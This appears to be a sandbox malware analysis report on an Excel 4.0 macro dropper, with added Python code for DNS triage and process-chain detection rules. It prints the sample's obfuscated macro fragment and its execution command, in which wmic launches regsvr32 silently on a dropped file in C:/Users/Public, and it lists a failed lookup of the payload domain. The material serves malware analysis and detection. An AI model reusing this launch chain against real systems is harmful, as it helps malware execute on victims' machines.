""&AE19&AF19&""'"")",,,,,,r,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,e,,,a,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,c,,,d,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,t,,,T,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,,,F,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,y,,,i,,,,,,,,,,,,,,,,,,,,,,,

                                                                                                                                                  Network Behavior

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  UDP Packets

                                                                                                                                                   Timestamp                            Source Port  Dest Port  Source IP    Dest IP
                                                                                                                                                   Apr 7, 2021 02:14:54.822761059 CEST  64938        53         192.168.2.3  8.8.8.8
                                                                                                                                                   Apr 7, 2021 02:14:54.836316109 CEST  53           64938      8.8.8.8      192.168.2.3
                                                                                                                                                   Apr 7, 2021 02:14:55.788259029 CEST  60152        53         192.168.2.3  8.8.8.8
                                                                                                                                                   Apr 7, 2021 02:14:55.801014900 CEST  53           60152      8.8.8.8      192.168.2.3
                                                                                                                                                   Apr 7, 2021 02:15:05.334461927 CEST  57544        53         192.168.2.3  8.8.8.8
                                                                                                                                                   Apr 7, 2021 02:15:05.351008892 CEST  53           57544      8.8.8.8      192.168.2.3
                                                                                                                                                   Apr 7, 2021 02:15:06.919131994 CEST  55984        53         192.168.2.3  8.8.8.8
                                                                                                                                                   Apr 7, 2021 02:15:06.970834017 CEST  53           55984      8.8.8.8      192.168.2.3
                                                                                                                                                   Apr 7, 2021 02:15:07.268354893 CEST  64185        53         192.168.2.3  8.8.8.8
                                                                                                                                                   Apr 7, 2021 02:15:07.300432920 CEST  53           64185      8.8.8.8      192.168.2.3
                                                                                                                                                   Apr 7, 2021 02:15:07.867729902 CEST  65110        53         192.168.2.3  8.8.8.8
                                                                                                                                                   Apr 7, 2021 02:15:07.883011103 CEST  53           65110      8.8.8.8      192.168.2.3
                                                                                                                                                   Apr 7, 2021 02:15:08.279006958 CEST  64185        53         192.168.2.3  8.8.8.8
                                                                                                                                                   Apr 7, 2021 02:15:08.294044018 CEST  53           64185      8.8.8.8      192.168.2.3
                                                                                                                                                   Apr 7, 2021 02:15:09.287517071 CEST  64185        53         192.168.2.3  8.8.8.8
                                                                                                                                                   Apr 7, 2021 02:15:09.318588018 CEST  53           64185      8.8.8.8      192.168.2.3
                                                                                                                                                   Apr 7, 2021 02:15:09.878669024 CEST  58361        53         192.168.2.3  8.8.8.8
                                                                                                                                                   Apr 7, 2021 02:15:09.900266886 CEST  53           58361      8.8.8.8      192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:10.039572001 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:10.054943085 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:11.056658030 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:11.072546005 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:11.305095911 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:11.318502903 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:11.822489977 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:11.836613894 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:12.538116932 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:12.550699949 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:13.315592051 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:13.328358889 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:14.567866087 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:14.580437899 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:15.303731918 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:15.318265915 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:16.320115089 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:16.332264900 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:18.314070940 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:18.326477051 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:19.351952076 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:19.365503073 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:20.328499079 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:20.341801882 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:22.822797060 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:22.838080883 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:23.693190098 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:23.705244064 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:24.502034903 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:24.516278028 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:24.548897028 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:24.561378002 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:27.916296959 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:27.936306000 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:32.802227974 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:32.827828884 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:15:59.458954096 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:15:59.471766949 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:16:02.065057993 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:16:02.085725069 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:16:33.418023109 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:16:33.434314966 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:16:40.256187916 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:16:40.284255981 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:16:40.944395065 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:16:40.962261915 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:17:15.378403902 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:17:15.390913963 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                  Apr 7, 2021 02:17:15.587543964 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                  Apr 7, 2021 02:17:15.613966942 CEST53612928.8.8.8192.168.2.3

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                  Apr 7, 2021 02:15:09.878669024 CEST192.168.2.38.8.8.80x9b18Standard query (0)xherzog24pv.xyzA (IP address)IN (0x0001)

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                  Apr 7, 2021 02:15:09.900266886 CEST8.8.8.8192.168.2.30x9b18Name error (3)xherzog24pv.xyznonenoneA (IP address)IN (0x0001)
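Reading the three tables together: every lookup from 192.168.2.3 went to 8.8.8.8, and the one query the report decodes, transaction 0x9b18 for xherzog24pv.xyz, came back about 22 ms later as Name error (3), which is NXDOMAIN. With no A record there is nothing for the macro's download stage to contact, so whatever the sample does after fetching its payload is not observed in this run. The Python below is an added example and not part of the Joe Sandbox report: it joins queries to answers on transaction ID, name and client address, names the reply code, lists domains that never resolved, and groups client-to-port-53 packets by source port so that a port reused several times within a few seconds (64185 above, at gaps of 1 s, 1 s, 2 s, 4 s, consistent with the Windows DNS client's retransmit schedule) stands out as one lookup being retried rather than five separate ones. QUERIES, ANSWERS and UDP are constructed from the report's own rows; RCODE_NAMES follows the IANA DNS RCODE registry.

```python
"""DNS triage over the report's UDP/DNS rows.

Added example, not part of the Joe Sandbox report. The QUERIES, ANSWERS and UDP
records below are constructed from the values printed in the tables above.
"""
from collections import defaultdict
from datetime import datetime

TS_FMT = "%b %d, %Y %H:%M:%S.%f"   # %f takes at most 6 digits; the report prints 9

# IANA DNS RCODE registry (subset)
RCODE_NAMES = {0: "NOERROR", 1: "FORMERR", 2: "SERVFAIL", 3: "NXDOMAIN", 5: "REFUSED"}

QUERIES = [  # constructed from the "DNS Queries" table
    {"ts": "Apr 7, 2021 02:15:09.878669024 CEST", "src": "192.168.2.3", "dst": "8.8.8.8",
     "txid": 0x9B18, "name": "xherzog24pv.xyz", "qtype": "A"},
]
ANSWERS = [  # constructed from the "DNS Answers" table; address None means no A record
    {"ts": "Apr 7, 2021 02:15:09.900266886 CEST", "src": "8.8.8.8", "dst": "192.168.2.3",
     "txid": 0x9B18, "rcode": 3, "name": "xherzog24pv.xyz", "address": None},
]
UDP = [  # constructed subset of the "UDP Packets" table: (timestamp, source port, dest port)
    ("Apr 7, 2021 02:14:55.788259029 CEST", 60152, 53),
    ("Apr 7, 2021 02:15:07.268354893 CEST", 64185, 53),
    ("Apr 7, 2021 02:15:08.279006958 CEST", 64185, 53),
    ("Apr 7, 2021 02:15:09.287517071 CEST", 64185, 53),
    ("Apr 7, 2021 02:15:09.878669024 CEST", 58361, 53),
    ("Apr 7, 2021 02:15:11.305095911 CEST", 64185, 53),
    ("Apr 7, 2021 02:15:15.303731918 CEST", 64185, 53),
]


def parse_ts(s: str) -> datetime:
    """'Apr 7, 2021 02:15:09.878669024 CEST' -> naive datetime.
    The zone label is dropped and the fraction truncated to microseconds."""
    stamp = s.rsplit(" ", 1)[0]            # strip 'CEST'
    head, frac = stamp.rsplit(".", 1)
    return datetime.strptime(f"{head}.{frac[:6]}", TS_FMT)


def correlate(queries, answers):
    """Join each query to its answer on (transaction ID, name, client IP) and
    report the reply code and round-trip time; unanswered queries get rcode None."""
    by_key = {(a["txid"], a["name"].lower(), a["dst"]): a for a in answers}
    results = []
    for q in queries:
        a = by_key.get((q["txid"], q["name"].lower(), q["src"]))
        rtt = None
        if a is not None:
            rtt = (parse_ts(a["ts"]) - parse_ts(q["ts"])).total_seconds() * 1000
        results.append({
            "name": q["name"],
            "txid": q["txid"],
            "rcode": None if a is None else RCODE_NAMES.get(a["rcode"], str(a["rcode"])),
            "address": None if a is None else a["address"],
            "rtt_ms": rtt,
        })
    return results


def unresolved_domains(results):
    """Names that yielded no address: NXDOMAIN, SERVFAIL, REFUSED or no reply at all.
    For a document dropper this is the 'payload host already gone' condition."""
    return sorted({r["name"] for r in results if r["address"] is None})


def retried_flows(udp, min_count=3):
    """Client->53 packets grouped by source port; returns the gaps in seconds between
    successive sends for every port used min_count or more times. The Windows DNS
    client re-sends an unsatisfied query from the same socket at 1 s, 1 s, 2 s, 4 s."""
    per_port = defaultdict(list)
    for ts, sport, dport in udp:
        if dport == 53:
            per_port[sport].append(parse_ts(ts))
    return {
        port: [round((later - earlier).total_seconds(), 1)
               for earlier, later in zip(times, times[1:])]
        for port, times in per_port.items() if len(times) >= min_count
    }


if __name__ == "__main__":
    results = correlate(QUERIES, ANSWERS)
    for r in results:
        rtt = "n/a" if r["rtt_ms"] is None else f"{r['rtt_ms']:.1f} ms"
        print(f"{r['name']} txid=0x{r['txid']:04x} rcode={r['rcode']} "
              f"address={r['address']} rtt={rtt}")
    print("unresolved:", unresolved_domains(results))
    print("retried source ports:", retried_flows(UDP))
```

On a real capture, take the reply code from the DNS header's RCODE field and key the join on the client port as well as the transaction ID, since 16-bit IDs repeat across a long pcap.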

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Behavior
System Behavior

General

Start time: 02:15:05
Start date: 07/04/2021 (7 April 2021)
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase: 0x12a0000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 02:15:09
Start date: 07/04/2021 (7 April 2021)
Path: C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit): true
Commandline: wmic.exe process call create 'regsvr32 -s C:/Users/Public/dbhfr.xref'
Imagebase: 0x300000
File size: 391680 bytes
MD5 hash: 79A01FCD1C8166C5642F37D1E0FB7BA8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 02:15:10
Start date: 07/04/2021 (7 April 2021)
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 02:15:10
Start date: 07/04/2021 (7 April 2021)
Path: C:\Windows\System32\regsvr32.exe
Wow64 process (32bit): false
Commandline: regsvr32 -s C:/Users/Public/dbhfr.xref
Imagebase: 0x7ff79bfa0000
File size: 24064 bytes
MD5 hash: D78B75FC68247E8A63ACBA846182740E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
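The four records above are the whole execution chain of this sample: EXCEL.EXE, started through COM automation (the /automation -Embedding switches) to open the workbook, runs the hidden Excel 4.0 macro, which calls wmic.exe process call create to start regsvr32 -s C:/Users/Public/dbhfr.xref, a file with a made-up extension in a world-writable directory (conhost.exe is just the console host for WMIC). Two details matter for detection. First, regsvr32 ignores the extension and accepts forward slashes: it LoadLibrary()s whatever path it is given and calls its DllRegisterServer export, and -s suppresses the result dialog. Second, a process created through Win32_Process.Create is parented to the WMI provider host (WmiPrvSE.exe), not to WMIC.exe or EXCEL.EXE, so in a process tree regsvr32.exe will not sit under Excel and a rule that only looks for Office spawning regsvr32 will not fire; the signal is in WMIC's and regsvr32's command lines. The Python below is an added example, not part of the Joe Sandbox report or of Joe Sandbox's own signatures: it applies a few rules keyed on image name and command line to process-creation records. PROCS is constructed from the command lines listed above; the parent field is an assumption about how an endpoint agent would record the same chain.

```python
"""Rule-based triage of the process records listed in this section.

Added example, not part of the Joe Sandbox report or its signatures. PROCS is
constructed from the command lines above; the 'parent' values are assumptions
about how an endpoint agent would record the same chain.
"""
import re
from pathlib import PureWindowsPath

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
REGISTRABLE_EXTS = (".dll", ".ocx", ".ax")
WRITABLE_DIRS = ("c:\\users\\public", "c:\\programdata", "c:\\windows\\temp")

PROCS = [
    {"image": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "cmdline": r"'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding",
     "parent": r"C:\Windows\System32\svchost.exe"},        # assumed: COM activation via DcomLaunch
    {"image": r"C:\Windows\SysWOW64\wbem\WMIC.exe",
     "cmdline": "wmic.exe process call create 'regsvr32 -s C:/Users/Public/dbhfr.xref'",
     "parent": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE"},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32 -s C:/Users/Public/dbhfr.xref",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},  # assumed: Win32_Process.Create parents to the WMI host
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, tolerating forward slashes."""
    return PureWindowsPath(path.replace("/", "\\")).name.lower()


def regsvr32_target(cmdline: str):
    """File regsvr32 is asked to load: the first token that is not a /x or -x switch.
    regsvr32 accepts forward slashes in the path and does not check the extension."""
    for tok in re.findall(r'"[^"]*"|\S+', cmdline)[1:]:
        if tok[:1] in "-/":           # /s, -s, /n, /i:<cmd> ...
            continue
        return tok.strip('"')
    return None


def evaluate(proc: dict) -> list:
    """Names of the rules tripped by one process-creation record."""
    image = basename(proc["image"])
    parent = basename(proc["parent"]) if proc.get("parent") else ""
    cmd = proc["cmdline"]
    hits = []

    if image == "wmic.exe" and re.search(r"\bprocess\s+call\s+create\b", cmd, re.I):
        hits.append("wmic_process_create")             # Win32_Process.Create from the CLI
        if parent in OFFICE_IMAGES:
            hits.append("office_spawns_wmic")
        if re.search(r"\bregsvr32\b", cmd, re.I):
            hits.append("wmic_launches_regsvr32")

    if image == "regsvr32.exe":
        target = regsvr32_target(cmd)
        if target:
            norm = target.replace("/", "\\").lower()
            if not norm.endswith(REGISTRABLE_EXTS):
                hits.append("regsvr32_non_dll_extension")
            if norm.startswith(WRITABLE_DIRS):
                hits.append("regsvr32_from_writable_dir")
        if re.search(r"(?:^|\s)[-/]s(?:\s|$)", cmd, re.I):
            hits.append("regsvr32_silent")
    return hits


def triage(procs) -> dict:
    """{image basename: [rule names]} for every record that trips at least one rule."""
    findings = {}
    for proc in procs:
        hits = evaluate(proc)
        if hits:
            findings[basename(proc["image"])] = hits
    return findings


if __name__ == "__main__":
    for image, rules in triage(PROCS).items():
        print(f"{image}: {', '.join(rules)}")
```

The rules are deliberately independent of lineage: wmic.exe is judged on its own command line and on its (Office) parent, and regsvr32.exe on what it is asked to load and from where, so the WMI hop between them does not hide the chain.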

Disassembly

Code Analysis
